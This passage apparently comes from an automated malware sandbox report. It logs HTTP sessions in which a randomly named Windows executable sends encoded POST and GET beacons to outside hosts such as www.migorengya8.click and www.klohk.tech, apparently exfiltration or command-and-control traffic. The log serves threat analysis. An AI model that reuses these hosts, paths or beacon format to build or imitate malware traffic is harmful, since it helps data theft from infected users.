78 41 76 38 71 6e 44 6a 47 61 34 78 68 48 51 71 51 32 65 35 42 62 49 39 38 30 30 49 52 51 37 30 69 31 49 50 4d 2f 4a 66 32 45 35 4b 63 4d 75 73 49 68 52 4d 32 56 56 62 4d 4b 70 51 71 65 53 37 43 4e 4c 50 47 72 42 58 45 6d 57 42 4d 59 64 38 31 44 62 47 2f 57 7a 6d 67 6c 48 46 34 41 61 46 54 32 77 3d 3d Data Ascii: R4qXin=vjjmaXWtymtuiwMz4XtzqFQTh6ivwkJ8hKF603BQ3nKK+Mop8UBqOppcf3vpaGrRN1nciD8kSF99cMbB+MpMfTjpy+5m6RoxAv8qnDjGa4xhHQqQ2e5BbI9800IRQ70i1IPM/Jf2E5KcMusIhRM2VVbMKpQqeS7CNLPGrBXEmWBMYd81DbG/WzmglHF4AaFT2w==
Nov 15, 2024 04:22:45.240910053 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 15 Nov 2024 03:22:45 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49814	198.252.98.54	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:22:47.149352074 CET	837	OUT	POST /y3dc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.migorengya8.click Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: no-cache Origin: http://www.migorengya8.click Referer: http://www.migorengya8.click/y3dc/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 76 6a 6a 6d 61 58 57 74 79 6d 74 75 6a 54 55 7a 72 6b 56 7a 73 6c 51 63 75 61 69 76 35 45 4a 34 68 4b 42 36 30 32 46 35 33 52 69 4b 39 74 59 70 75 46 42 71 65 35 70 63 4b 48 75 6a 56 6d 72 67 4e 31 71 6a 69 44 41 6b 53 46 70 39 63 4e 72 42 2b 2f 42 50 66 44 6a 72 2b 65 35 67 30 78 6f 78 41 76 38 71 6e 44 33 6f 61 34 35 68 48 67 61 51 6b 50 35 4f 57 6f 39 2f 6b 45 49 52 44 72 30 6d 31 49 4f 6a 2f 49 43 6a 45 2f 47 63 4d 72 41 49 69 44 30 70 63 56 62 4b 4f 70 52 72 52 78 4b 30 4c 71 6d 4d 70 44 57 67 37 48 74 38 51 37 78 76 53 71 6e 6f 45 7a 43 54 34 41 4d 4d 4e 5a 34 61 74 38 30 6f 39 79 78 44 65 43 42 50 39 77 70 61 71 36 35 76 65 63 45 3d Data Ascii: R4qXin=vjjmaXWtymtujTUzrkVzslQcuaiv5EJ4hKB602F53RiK9tYpuFBqe5pcKHujVmrgN1qjiDAkSFp9cNrB+/BPfDjr+e5g0xoxAv8qnD3oa45hHgaQkP5OWo9/kEIRDr0m1IOj/ICjE/GcMrAIiD0pcVbKOpRrRxK0LqmMpDWg7Ht8Q7xvSqnoEzCT4AMMNZ4at80o9yxDeCBP9wpaq65vecE=
Nov 15, 2024 04:22:47.788678885 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 15 Nov 2024 03:22:47 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49815	198.252.98.54	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:22:49.732640028 CET	10919	OUT	POST /y3dc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.migorengya8.click Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Cache-Control: no-cache Origin: http://www.migorengya8.click Referer: http://www.migorengya8.click/y3dc/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 76 6a 6a 6d 61 58 57 74 79 6d 74 75 6a 54 55 7a 72 6b 56 7a 73 6c 51 63 75 61 69 76 35 45 4a 34 68 4b 42 36 30 32 46 35 33 52 61 4b 2b 65 41 70 38 79 39 71 64 35 70 63 57 58 75 67 56 6d 72 39 4e 31 79 76 69 44 4d 65 53 48 52 39 63 76 6a 42 33 75 42 50 4d 6a 6a 72 6a 4f 35 68 36 52 6f 42 41 76 73 75 6e 44 6e 6f 61 34 35 68 48 69 43 51 6e 65 35 4f 46 34 39 38 30 30 49 56 51 37 30 65 31 49 6d 5a 2f 49 47 7a 48 50 6d 63 4d 4b 73 49 75 57 59 70 45 46 62 49 4a 70 51 34 52 78 47 6e 4c 71 36 75 70 43 7a 46 37 45 78 38 56 75 49 75 41 50 48 53 61 77 36 65 37 67 34 4c 45 4c 6b 4c 74 66 6f 7a 74 48 73 66 64 44 31 63 2f 68 41 74 36 37 6f 70 64 62 78 44 53 50 63 79 76 74 58 43 7a 36 7a 4c 76 47 7a 69 72 6e 36 6d 63 7a 49 70 6e 59 5a 70 31 68 34 48 48 50 57 30 49 4d 30 30 46 59 36 68 6f 4c 55 6c 6b 4f 71 6d 62 31 48 51 51 68 62 43 61 38 53 45 69 77 45 2f 55 6c 70 46 63 2f 59 79 58 4c 45 6b 41 67 6e 6f 36 62 47 4a 4e 57 7a 6f 79 38 6e 6c 74 7a 49 4a 49 4f 4d 6d 4e 2b 41 6d 72 66 49 53 63 62 48 [TRUNCATED] Data Ascii: R4qXin=vjjmaXWtymtujTUzrkVzslQcuaiv5EJ4hKB602F53RaK+eAp8y9qd5pcWXugVmr9N1yviDMeSHR9cvjB3uBPMjjrjO5h6RoBAvsunDnoa45hHiCQne5OF49800IVQ70e1ImZ/IGzHPmcMKsIuWYpEFbIJpQ4RxGnLq6upCzF7Ex8VuIuAPHSaw6e7g4LELkLtfoztHsfdD1c/hAt67opdbxDSPcyvtXCz6zLvGzirn6mczIpnYZp1h4HHPW0IM00FY6hoLUlkOqmb1HQQhbCa8SEiwE/UlpFc/YyXLEkAgno6bGJNWzoy8nltzIJIOMmN+AmrfIScbHNj1SsSu8/DV3LokIKxyXYM0pAhn19yipfkNMG76EygWJyXGs69QDNOCJv5C5Td1hUAIUyPOD3+Tiizb/wzxYh7t89iq9AyWRKRIDTXxWPZ3tI1uKgPeM7wF4JZwURnfHknItAaLs/v2sIOgB3/Xtooj1AUVI3muo4JzCDsAbuM5xN5Uqji02VYAQyMzPblNHXOlyBSkFFWTr2BL5Q+H7mmoOnogJmR3pRivoOSE+QCIq4ApOxLeKFmL+WCm6rehfpDCyfUPoKvd4JA7O+Qt/1jmy7lTqYcN4yqHp65RwAbkwaUnbexE3kJK3XDxDrYmrb4D5vbyoQ8I6u9lJcfNGPbZv/iFZ64QxN9ofMTR1UDx0rDAj2K02swPYkqw6xs2H4igdkhFouUHal29vvNI5V7lOv0sXhqe2z0Pa+qHWThdUpcLXGNYHTWNdGhzMm5i5p6QvlWSvnAl4SrzJ3MaWM3noLw0CElMvKjofH61JAth36doCCG8szZ4Io7/BIDO96E+f8qTTehwQXISjRRHGXd4jO8Jk8AxhbLaRgUI+i0U31d4iPfnOGRFjKSl0q+uYAPn4CFSytQommTSRNrZJR3tUeAcimJD9Q843sYbIO+pwXdIdztjxSlT37a6/JhjeQXVhbPACBJPEcUMl09zyOwsEsHaNFfG4HO [TRUNCATED]
Nov 15, 2024 04:22:50.374857903 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 15 Nov 2024 03:22:50 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49816	198.252.98.54	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:22:52.285370111 CET	547	OUT	GET /y3dc/?R4qXin=ihLGZn7rk3oJmiIz33Bz1E4xhZDY72dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tRERgPwyb4b9y8rXeUu2h/5aaRRGXSXrvcfb4U=&A69pk=_b0Tr07p9f0pn HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.migorengya8.click Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 15, 2024 04:22:52.922998905 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 15 Nov 2024 03:22:52 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49817	103.224.182.242	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:22:58.428462029 CET	796	OUT	POST /3m3e/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.klohk.tech Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: no-cache Origin: http://www.klohk.tech Referer: http://www.klohk.tech/3m3e/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 4e 45 55 51 6e 71 39 53 61 62 37 6d 7a 75 51 52 45 34 53 66 75 52 79 78 62 65 66 58 75 77 35 6d 2f 6e 59 37 44 63 52 59 36 78 35 39 56 78 53 71 58 57 45 69 2b 2f 78 57 4f 34 4e 4b 4e 6d 6a 56 79 6f 73 79 49 34 34 37 48 4e 35 61 47 51 76 4e 6b 48 59 76 47 2b 6b 7a 62 6c 70 72 70 68 4d 77 75 41 36 38 4f 54 76 74 38 5a 41 61 77 37 31 52 63 47 36 58 32 2b 49 51 61 62 30 56 32 6b 74 6f 54 70 33 79 72 4c 78 76 69 7a 4e 76 67 53 79 30 44 73 47 5a 76 34 6b 51 39 42 66 36 52 39 35 79 6d 69 63 45 62 77 65 51 79 76 6c 53 42 59 54 44 2f 4d 6c 31 4b 2b 41 59 59 37 6d 6f 70 58 38 2b 62 41 3d 3d Data Ascii: R4qXin=NEUQnq9Sab7mzuQRE4SfuRyxbefXuw5m/nY7DcRY6x59VxSqXWEi+/xWO4NKNmjVyosyI447HN5aGQvNkHYvG+kzblprphMwuA68OTvt8ZAaw71RcG6X2+IQab0V2ktoTp3yrLxvizNvgSy0DsGZv4kQ9Bf6R95ymicEbweQyvlSBYTD/Ml1K+AYY7mopX8+bA==
Nov 15, 2024 04:22:59.095360994 CET	871	IN	HTTP/1.1 200 OK date: Fri, 15 Nov 2024 03:22:58 GMT server: Apache set-cookie: __tad=1731640978.1427526; expires=Mon, 13-Nov-2034 03:22:58 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 576 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 b9 6d 6d b3 cd 08 55 53 e4 e7 48 54 78 e5 74 4f 40 c7 1e 45 4c 78 47 f9 46 ee e5 39 1a 83 77 4a c4 f9 c6 e7 b5 36 6b 74 bd d3 86 72 ad 6b cc 3a 6d b2 8d 8f cb 22 3f 63 5f 4b 55 46 7b e9 c0 61 a5 1d 2a fa d9 6a b3 05 01 49 43 d4 2f f2 fc 70 38 64 cf ea f2 79 37 c7 fc 43 b2 8c a2 3c 87 5b 24 90 40 ba 43 bb 23 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 0e d5 8e 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 19 45 da 1a 3e 6e db 95 54 db 9b 31 55 3a 85 fb 68 72 d0 a6 b2 87 ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f 97 49 dd 8b ab f7 c9 74 19 9d a2 88 dc 31 30 59 a5 27 70 95 fb 3e 9a 10 e0 91 c6 4d fa 67 b5 37 c1 20 f3 27 a1 61 75 ff 6d d4 2c e0 d3 b3 93 2f b7 ac 43 56 e9 7d 67 8d 26 cb a1 f5 22 c8 f6 78 0a cc 27 56 [TRUNCATED] Data Ascii: TMo0=pvNl;a"[$&iPrm:]lQebmmUSHTxtO@ELxGF9wJ6ktrk:m"?c_KUF{a*jIC/p8dy7C<[$@C#5g3r@%@@;i1[umLE>nT1U:hrJTo7OIt10Y'p>Mg7 'aum,/CV}g&"x'V4d=ekd;8L]K~,`'<#j9TRnz>v2!>cUsCCW_yae+n4k5'`bxjlk/a&aI=?.X,$4k0OV[h0C^\;DLl?n)1;y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49818	103.224.182.242	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:23:00.986793041 CET	816	OUT	POST /3m3e/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.klohk.tech Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: no-cache Origin: http://www.klohk.tech Referer: http://www.klohk.tech/3m3e/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 4e 45 55 51 6e 71 39 53 61 62 37 6d 77 4e 59 52 49 2f 47 66 35 68 79 32 65 65 66 58 37 67 35 69 2f 6e 45 37 44 66 64 32 39 45 4a 39 56 51 69 71 55 58 45 69 39 2f 78 57 47 59 4d 41 44 47 69 62 79 6f 78 52 49 36 63 37 48 4f 46 61 47 52 66 4e 6b 32 59 73 58 2b 6b 78 58 46 70 70 30 78 4d 77 75 41 36 38 4f 53 4c 54 38 5a 6f 61 78 4b 46 52 63 6e 36 55 2f 65 49 50 64 62 30 56 79 6b 74 6b 54 70 32 56 72 4b 64 4a 69 31 42 76 67 58 65 30 44 65 75 57 32 49 6b 65 69 78 65 39 63 63 6b 33 6f 79 6c 46 52 68 36 67 2f 38 46 71 45 65 65 5a 75 39 45 69 59 2b 6b 72 46 38 76 63 6b 55 42 33 41 4a 58 4d 4d 69 74 31 54 53 56 64 34 4b 44 69 6c 62 51 64 53 7a 59 3d Data Ascii: R4qXin=NEUQnq9Sab7mwNYRI/Gf5hy2eefX7g5i/nE7Dfd29EJ9VQiqUXEi9/xWGYMADGibyoxRI6c7HOFaGRfNk2YsX+kxXFpp0xMwuA68OSLT8ZoaxKFRcn6U/eIPdb0VyktkTp2VrKdJi1BvgXe0DeuW2Ikeixe9cck3oylFRh6g/8FqEeeZu9EiY+krF8vckUB3AJXMMit1TSVd4KDilbQdSzY=
Nov 15, 2024 04:23:01.654093981 CET	871	IN	HTTP/1.1 200 OK date: Fri, 15 Nov 2024 03:23:01 GMT server: Apache set-cookie: __tad=1731640981.6038068; expires=Mon, 13-Nov-2034 03:23:01 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 576 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 b9 6d 6d b3 cd 08 55 53 e4 e7 48 54 78 e5 74 4f 40 c7 1e 45 4c 78 47 f9 46 ee e5 39 1a 83 77 4a c4 f9 c6 e7 b5 36 6b 74 bd d3 86 72 ad 6b cc 3a 6d b2 8d 8f cb 22 3f 63 5f 4b 55 46 7b e9 c0 61 a5 1d 2a fa d9 6a b3 05 01 49 43 d4 2f f2 fc 70 38 64 cf ea f2 79 37 c7 fc 43 b2 8c a2 3c 87 5b 24 90 40 ba 43 bb 23 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 0e d5 8e 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 19 45 da 1a 3e 6e db 95 54 db 9b 31 55 3a 85 fb 68 72 d0 a6 b2 87 ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f 97 49 dd 8b ab f7 c9 74 19 9d a2 88 dc 31 30 59 a5 27 70 95 fb 3e 9a 10 e0 91 c6 4d fa 67 b5 37 c1 20 f3 27 a1 61 75 ff 6d d4 2c e0 d3 b3 93 2f b7 ac 43 56 e9 7d 67 8d 26 cb a1 f5 22 c8 f6 78 0a cc 27 56 [TRUNCATED] Data Ascii: TMo0=pvNl;a"[$&iPrm:]lQebmmUSHTxtO@ELxGF9wJ6ktrk:m"?c_KUF{a*jIC/p8dy7C<[$@C#5g3r@%@@;i1[umLE>nT1U:hrJTo7OIt10Y'p>Mg7 'aum,/CV}g&"x'V4d=ekd;8L]K~,`'<#j9TRnz>v2!>cUsCCW_yae+n4k5'`bxjlk/a&aI=?.X,$4k0OV[h0C^\;DLl?n)1;y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49819	103.224.182.242	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
